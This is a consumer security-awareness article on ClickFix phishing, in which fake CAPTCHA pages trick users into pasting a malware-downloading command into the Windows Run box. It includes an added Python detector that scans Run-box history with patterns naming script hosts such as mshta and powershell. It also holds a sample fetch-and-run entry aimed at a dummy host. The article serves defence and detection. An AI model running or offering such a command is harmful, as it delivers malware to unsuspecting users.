
ClickFix attacks are a new kind of phishing attack that uses your trusting nature against you, getting you to help the scammers do their dirty work.
Know those little boxes that pop up on websites that make us prove we are a human and not a robot? These are called Captcha boxes. And they are called that for a reason. It is actually an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart”.

How the scam works is you get an email with a link. You open the link and you get a page that displays a Captcha test similar to the above. However, this one comes with some special instructions…

Here, you don’t just have to check a box or select all the pictures that have a motorcycle in them. You are asked to do some stuff on your keyboard.
In this example they are trying to get you to open a prompt on your computer that takes instructions, called the Run Command. You press CTRL+V and this pastes a command that has been put into your clipboard. Pressing Enter actually runs the command on your computer.
So, you basically just ran a command on your computer for the scammers. What that command does is utilize a part of your system to start downloading malware from a website.
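Windows keeps a per-user history of what has been typed or pasted into the Run box, so a paste like the one described above can be looked for afterwards. The script below is an added example, not part of the original article; the registry location is standard Windows behaviour, while the rule names, patterns, threshold and sample entries are assumptions constructed for illustration.

```python
import re
import sys

# Assumed heuristics (not from the article): programs able to fetch or run
# remote content, a URL, hidden/encoded switches, and fake "verification" text.
RULES = {
    "script_host": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|msiexec)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(r"\s-w\w*\s+h\w*|\s-enc\w*\s", re.I),
    "captcha_lure": re.compile(r"not a robot|captcha|verif", re.I),
}

def suspicious(entries, threshold=2):
    """Return [(command, matched_rule_names)] for entries hitting >= threshold rules."""
    flagged = []
    for raw in entries:
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # RunMRU values end in "\1"
        hits = sorted(name for name, rx in RULES.items() if rx.search(cmd))
        if len(hits) >= threshold:
            flagged.append((cmd, hits))
    return flagged

def read_run_history():
    """Read the current user's Run-dialog history from the registry (Windows only)."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            count = winreg.QueryInfoKey(key)[1]
            values = [winreg.EnumValue(key, i) for i in range(count)]
    except FileNotFoundError:
        return []  # nothing has been typed into Run yet
    return [str(v) for name, v, _ in values if name != "MRUList"]

# Constructed sample history; example.invalid never resolves.
SAMPLE = [
    "notepad\\1",
    "cmd\\1",
    "\\\\fileserver\\share\\1",
    "mshta https://example.invalid/check # I am not a robot - Verification ID 1234\\1",
]

if __name__ == "__main__":
    entries = read_run_history() if sys.platform == "win32" else SAMPLE
    for cmd, hits in suspicious(entries):
        print(f"REVIEW {cmd!r}: {', '.join(hits)}")
```

A single rule match (for example, someone legitimately opening `cmd`) is not flagged; only entries that combine two or more signals are listed for review.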
Same Thing, Different Presentation
There are multiple variations of this scam, but they all pretty much act the same way. They might just start off a bit differently. Here are samples to keep an eye out for:





As you can see, there are multiple ways to pull off this scam. Always remember the 4 P’s when opening strange links and whenever you encounter something different.